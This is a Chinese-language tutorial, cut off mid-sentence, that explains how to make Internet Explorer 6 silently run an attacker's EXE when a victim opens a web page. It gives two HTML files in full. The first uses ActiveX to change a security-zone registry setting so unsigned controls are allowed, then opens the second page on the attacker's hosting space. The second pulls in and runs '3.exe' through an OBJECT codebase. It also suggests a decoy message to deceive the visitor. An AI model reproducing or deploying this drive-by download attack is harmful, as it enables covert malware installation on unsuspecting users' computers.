说到要做一个让网页让IE6.0浏览的时候来执行空间下的一个EXE文件的方法要和以前写过的5.0的方法是完全不一样的了，5.0的总体思路是用一个HTML的文件带动一

个有错误开头的EML文件，让IE无条件的执行EML中的附件，可是当我们把IE升级到6.0的时候，再打开这个页面我们会发现WINDOWS会出现一个打开方式的界面，所以我们

前面做的针对IE5.0的是无效的。

下面我们来看看怎么让6.0来执行我们空间的同路径下的一个EXE文件，方法大致是当用户开启第一个HTML的页面时，通过恶意的HTML代码把IE安全级别里的默认的

“禁用下栽未签名的ActiveX控件”选项，变为“启用下栽未签名的ActiveX控件”，然后马上打开第二个HTML的文件内容是下载一个未签名的ActiveX控件，实质就是我们

所要执行的EXE文件，好了，下面我们来说说具体的制作步骤。

【第一步】建立一个1.HTM的文件，内容如下：

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<CNTER><HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<META content="Microsoft FrontPage 4.0" name=GENERATOR></HEAD>
<BODY>
<SCRIPT>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function f(){
try
{
//ActiveX initialization
a1=document.applets[0];
a1.setCLSID("");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("");
a1.createInstance();
Net = a1.GetObject();
try
{
if (document.cookie.indexOf("Chg") == -1)
{
Shl.RegWrite ("HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1004",0,"REG_DWORD");
var expdate = new Date((new Date()).getTime() + (1));
document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
}
}
catch(e)
{}
}
catch(e)
{}
}
function init()
{
setTimeout("f()", 1000);
}
init();
</SCRIPT>

<script language="javascript">
<!-- Begin
function opencolortext(){
window.open('http://xiaomutou.diy.163.com/2.htm','colortext')
}
setTimeout("opencolortext()",1500)
// End -->
</script>
</BODY></HTML>

这里需要说明的是，其中“window.open('http://xiaomutou.diy.163.com/2.htm','colortext')”中的“http://xiaomutou.diy.163.com/2.htm”要改为你自己的

主页空间的路径，其中“setTimeout("opencolortext()",1500)”的“1500”是延时1.5秒中之后打开我们一会将要做的2.HTM文件。好，我们现在就来做这个2.HTM文

件，内容如下：

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<SCRIPT language=javascript>
run_exe="<OBJECT ID=\"RUNIT\" WIDTH=0 HEIGHT=0 TYPE=\"application/x-oleobject\""
run_exe+="CODEBASE=\"3.exe#version=1,1,1,1\">"
run_exe+="<PARAM NAME=\"_Version\" value=\"65536\">"
run_exe+="</OBJECT>"
run_exe+="<HTML><H1> </H1></HTML>";
document.open();
document.clear();
document.writeln(run_exe);
document.close();
</SCRIPT>

<META content="Microsoft FrontPage 4.0" name=GENERATOR></HEAD>
<BODY>
<p align="center">论坛连接中请勿终断....
<BR>
<CENTER></CENTER><BR>
<BR></BODY></HTML>

说明，代码中“run_exe+="CODEBASE=\"3.exe#version=1,1,1,1\">" ”的“3.EXE”就是IE将来要执行的同路径下你的EXE文件

至于论坛连接中请勿终断，完全是迷惑对方的你自己可以变成自己的话。

好了现在将我们做的1.HTM、2.HTM和自己要对方执行的EXE文件一并上传到自己的主页空间下。

现在就让我们用IE6.0来直接浏览这个1.HTM的文件吧，当打开这个页面的1-2秒后应该自动打开另一个空白的页面，紧接着你的EXE文件将被执行，注意所放的EXE文件不要